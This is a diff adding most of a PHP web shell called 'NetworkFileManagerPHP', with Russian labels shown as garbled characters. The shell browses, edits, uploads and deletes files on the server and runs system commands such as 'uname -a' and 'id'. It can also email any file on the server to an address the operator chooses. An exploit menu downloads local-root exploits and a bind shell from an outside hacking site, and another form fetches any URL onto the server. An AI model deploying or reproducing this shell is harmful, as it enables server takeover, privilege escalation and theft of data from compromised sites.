+&nbsp;&nbsp;localroot root linux 2.4.* - ��������� ������, ������ ROOT �� ��������������� ������, �������� ����� ��� � ������<br>
+<dd><b>������:</b> ./root<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[6] = "sxp";
+$title_exp[6] = "
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - ��������� ������, ������ ROOT �� ��������������� ������, �������� ����� ��� � ������<br>
+<dd><b>������:</b> ./sxp<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[7] = "ptrace_kmod";
+$title_exp[7] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ��������� ������, ������ ROOT �� ��������������� ������, �������� ����� ��� � ������, ���������� ���� ����� ptarce + kmod<br>
+<dd><b>������:</b> ./ptrace_kmod<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[8] = "mr1_a";
+$title_exp[8] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ��������� ������, ������ ROOT �� ��������������� ������, �������� ����� ��� � ������, �������� ����� ��� � ������<br>
+<dd><b>������:</b> ./mr1_a<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+/* ������ ���� � �����, ��� ����� ��������� ��������� */
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+endif;
+
+/* ������ ������ �� �������� �� ��������� ������������������� ������� */
+global $action,$tm,$cm;
+
+function getdir() {
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+ $st = getcwd();
+ $st = str_replace("\\","/",$st);
+ $j = 0;
+ $gdir = array();
+ $gsub = array();
+ print("<br>");
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+  if ($st[$i] != "/") {
+   $gdir[$j] = $gdir[$j].$st[$i];
+   $gsub[$j] = $gsub[$j].$st[$i];
+  } else {
+   $gdir[$j] = $gdir[$j]."/";
+   $gsub[$j] = $gsub[$j]."/";
+   $gdir[$j+1] = $gdir[$j];
+   $j++;
+  }
+ }
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;������� ����������: </b>");
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+ $free = tinhbyte(diskfreespace("./"));
+ print("</td></tr><tr><td align=left><b>&nbsp;&nbsp;��������� �������� ������������</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+ print("<tr><td align=left><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+ print("<tr><td align=left><b>&nbsp;&nbsp;��� IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr>");
+ print("<tr><td align=left><b>&nbsp;&nbsp;���� � ������:(GHz)</b> ".exec("cat /proc/cpuinfo | grep GHz")."</td></tr>");
+ print("<tr><td align=left><b><b>&nbsp;&nbsp;���� � ������:(MHz)</b> ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+ print("<tr><td align=left><b>&nbsp; ".exec("id")."</b></td></tr></table><br>");
+
+}
+
+function tinhbyte($filesize) {
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+ else { $filesize = $filesize . ""; }
+ return $filesize;
+}
+
+function permissions($mode) {
+ $perms  = ($mode & 00400) ? "r" : "-";
+ $perms .= ($mode & 00200) ? "w" : "-";
+ $perms .= ($mode & 00100) ? "x" : "-";
+ $perms .= ($mode & 00040) ? "r" : "-";
+ $perms .= ($mode & 00020) ? "w" : "-";
+ $perms .= ($mode & 00010) ? "x" : "-";
+ $perms .= ($mode & 00004) ? "r" : "-";
+ $perms .= ($mode & 00002) ? "w" : "-";
+ $perms .= ($mode & 00001) ? "x" : "-";
+ return $perms;
+ 
+ 
+}
+
+function readdirdata($dir) {
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+ $files = array();
+ $dirs= array();
+ $open = @opendir($dir);
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>��� �������.</b></td></tr></table>";
+ else {
+  $open = opendir($dir);
+  while ($file = readdir($open)) {
+   $rec = $file;
+   $file = $dir."/".$file;
+   if (is_file($file)) $files[] = $rec;
+  }
+  sort($files);
+  $open = opendir($dir);
+  $i=0;
+  while ($dire = readdir($open)) {
+   if ( $dire != "." ) {
+    $rec = $dire;
+    $dire = $dir."/".$dire;
+    if (is_dir($dire)) {
+     $dirs[] = $rec;
+     $i++;
+    }
+   }
+  }
+  sort($dirs);
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>���</b></td><td width = '10%' align = 'center' class=pagetitle><b>������</b></td><td width = '20%' align = 'center' class=pagetitle><b>���� ��������</b></td><td width = '10%' align = 'center' class=pagetitle><b>���</b></td><td width = '15%' align = 'center' class=pagetitle><b>����� �������</b></td><td width = '25%' align = 'center' class=pagetitle><b>�����������</b></td></tr></table>");
+  for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+    $type = 'Dir';
+    $fullpath = $dir."/".$dirs[$i];
+    $time = date("d/m/y H:i",filemtime($fullpath));
+    $perm = permissions(fileperms($fullpath));
+    $size = tinhbyte(filesize($fullpath));
+    $name = $dirs[$i];
+    $fullpath = $tm."/".$dirs[$i];
+    if ($perm[7] == "w" && $name != "..") $action = "
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>���������</a></td>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>�������</a></td>
+	</tr>
+	<tr>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>����� ����������</a></td>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>��������� �����</a></td>
+	</tr></table>";
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>������ ������</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>��������� �����</a></td></tr></table>";
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+   }
+  }
+  for ($i=0;$i<sizeof($files);$i++) {
+   $type = 'File';
+   $fullpath =  $dir."/".$files[$i];
+   $time = date("d/m/y H:i",filemtime($fullpath));
+   $perm = permissions(fileperms($fullpath));
+   $size = tinhbyte(filesize($fullpath));
+   $owner = @chown($fullpath, "nobody");
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>��������</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>������</a></td></tr>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>�� ����</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>����������</a></td>
+   </tr></table>";
+   if ( $owner == "nobody" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>�������������</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>�������</a></td>
+   </tr></table>";
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+  }
+ }
+}
+
+function html() {
+global $ver,$meta,$style;
+echo "
+<html>
+<head>
+<title>NetworkFileManagerPHP</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+";
+}
+
+# �������� �����
+function viewfile($dir,$file) {
+
+ $buf = explode(".", $file);
+ $ext = $buf[sizeof($buf)-1];
+ $ext = strtolower($ext);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ 
+ switch ($ext) {
+  case "jpg":
+    
+	header("Content-type: image/jpeg");
+    readfile($fullpath);
+    break;
+    case "jpeg":
+	
+    header("Content-type: image/jpeg");
+    readfile($fullpath);
+    break;
+    case "gif":
+	
+    header("Content-type: image/gif");
+    readfile($fullpath);
+    break;
+	 
+	 case "png":
+	
+    header("Content-type: image/png");
+    readfile($fullpath);
+    break;
+    default:
+	
+	 case "avi":	
+    header("Content-type: video/avi");
+    readfile($fullpath);
+
+    break;
+    default:
+	
+	 case "mpeg":	
+    header("Content-type: video/mpeg");
+    readfile($fullpath);
+    break;
+    default:
+	
+	 case "mpg":	
+    header("Content-type: video/mpg");
+    readfile($fullpath);
+    break;
+    default:
+		
+    html();
+	chdir($dir);
+    getdir();
+	
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>���� �� �����:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+   $fp = fopen($fullpath , "r");
+   while (!feof($fp)) {
+    $char = fgetc($fp);
+    $st .= $char;
+   }
+
+   $st = str_replace("&", "&amp;", $st);
+   $st = str_replace("<", "&lt;", $st);
+   $st = str_replace(">", "&gt;", $st);
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+   echo $tem;
+   fclose($fp);
+   break;
+ }
+}
+
+# �������� ����� �� ����
+function download_mail($dir,$file) {
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+ $buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NetworkFileManagerPHP  ($file)";
+  
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== ��������� �� ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";             
+   
+  $send = mail($send_to, $subject, $info, $headers);
+  
+  if($send == 2)  
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>�������!!!���� <b>$file</b> ��������� ��� �� <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+ }
+
+
+
+function copyfile($dir,$file) {
+ global $action,$tm;
+ $fullpath = $dir."/".$file;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>��� ����� :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; ���������� � ���������� &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+ if (!copy($file, $file.'.bak')){
+   echo (" ������ ����������� ���� $file");
+   }
+}
+
+
+# �������������� �����
+function editfile($dir,$file) {
+ global $action,$datar;
+ $fullpath = $dir."/".$file;
+ chdir($dir);
+ getdir();
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>��� ����� :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+ $fp = fopen($fullpath , "r");
+ while (!feof($fp)) {
+  $char = fgetc($fp);
+  $st .= $char;
+ }
+ $st = str_replace("&", "&amp;", $st);
+ $st = str_replace("<", "&lt;", $st);
+ $st = str_replace(">", "&gt;", $st);
+ $st = str_replace('"', "&quot;", $st);
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='�������' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+ $datar = $S1;
+ 
+}
+
+# ������ �����
+function savefile($dir,$file) {
+ global $action,$S1,$tm;
+ $fullpath = $dir."/".$file;
+ $fp = fopen($fullpath, "w");
+ $S1 = stripslashes($S1);
+ fwrite($fp,$S1);
+ fclose($fp);
+ chdir($dir);
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>���� <b>$fullpath</b> ��������������.</font></td></tr></table>";
+ getdir();
+ readdirdata($tm);
+}
+
+# �������� ����������
+function deletef($dir)
+{
+ global $action,$tm,$fi;
+ $tm = str_replace("\\\\","/",$tm);
+ $link = $tm."/".$fi;
+ unlink($link);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# �������� �����
+function uploadtem() {
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>�������� �����:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='��������� ����' class=button1 $style_button></td></tr></form></table>";
+}
+
+function upload() {
+ global $HTTP_POST_FILES,$tm;
+ echo $set;
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("�� ���� ��������� ����".$HTTP_POST_FILES["userfile"][name]);
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>���� <b>".$HTTP_POST_FILES["userfile"][name]."</b> ������� ��������.</font></center></td></tr></table>";
+ @unlink($userfile);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# ������� ����������
+function upload_exploits() {
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+ 
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>��������� ���������:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>BASH ���</b> - bindtty.c (���� ������� <u>s</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+ <input type='hidden' name='file2' value='$public[1]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (���� ������� <u>m</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+ <input type='hidden' name='file2' value='$public[2]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (���� ������� <u>p</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+ <input type='hidden' name='file2' value='$public[3]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>psyBNC ������:2.3.2-4</b> - psyBNC (���� ������� <u>./psybnc</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+ <input type='hidden' name='file2' value='$public[4]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>��������� ���������:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.*(���� ������� <u>brk</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+ <input type='hidden' name='file2' value='$private[1]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>���� 1</u></b> (���� ������� <u>$private[2]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+ <input type='hidden' name='file2' value='$private[2]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>���� 2</u></b> (���� ������� <u>$private[3]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+ <input type='hidden' name='file2' value='$private[3]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (���� ������� <u>$private[4]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+ <input type='hidden' name='file2' value='$private[4]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (���� ������� <u>$private[5]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+ <input type='hidden' name='file2' value='$private[5]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+   echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (���� ������� <u>$private[6]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+ <input type='hidden' name='file2' value='$private[6]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+    echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (���� ������� <u>$private[7]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+ <input type='hidden' name='file2' value='$private[7]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+     echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (���� ������� <u>$private[8]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+ <input type='hidden' name='file2' value='$private[8]'>
+ <input type='submit' value='��������� ����' class=button1 $style_button></td></tr>
+ </form></table>";
+}
+
+
+# �������� ����� ����������
+function newdir($dir) {
+ global $tm,$nd;
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>������� ����������:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='C������' class=button1 $style_button></td></tr></form></table>");
+}
+
+function cdir($dir) {
+ global $newd,$tm;
+ $fullpath = $dir."/".$newd;
+ if (file_exists($fullpath)) @rmdir($fullpath);
+ if (@mkdir($fullpath,0777)) {
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>���������� �������.</font></center></td></tr></table>";
+ } else {
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>������ � �������� ����������.</font></center></td></tr></table>";
+ }
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+// �������� ����������� Files ��� �������� ������
+function downfiles() {
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+$st = getcwd();
+ $st = str_replace("\\","/",$st);
+ $j = 0;
+ $gdir = array();
+ $gsub = array();
+ print("<br>");
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+  if ($st[$i] != "/") {
+   $gdir[$j] = $gdir[$j].$st[$i];
+   $gsub[$j] = $gsub[$j].$st[$i];
+  } else {
+   $gdir[$j] = $gdir[$j]."/";
+   $gsub[$j] = $gsub[$j]."/";
+   $gdir[$j+1] = $gdir[$j];
+   $j++;
+  }
+ }
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;����: </b>");
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+print("</TABLE> ");
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>�������� ������ � ���������� ����������:</b></td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP ���� �� �����:</td>
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+ </tr>
+  <tr>
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;�������� ����� ��� ���� � ��������� �����</td>
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+ </tr>
+  <tr>
+
+ <td width=600 colspan=2 align=center><input type='submit' value='��������� ����' class=button1 $style_button></td></tr></td>
+ 
+ 
+ </tr></form></table>";
+
+}
+
+# �������� ���������� 
+function deldir() {
+ global $dd,$tm;
+ $fullpath = $tm."/".$dd;
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>���������� �������.</font></center></td></tr></table>";
+ rmdir($fullpath);
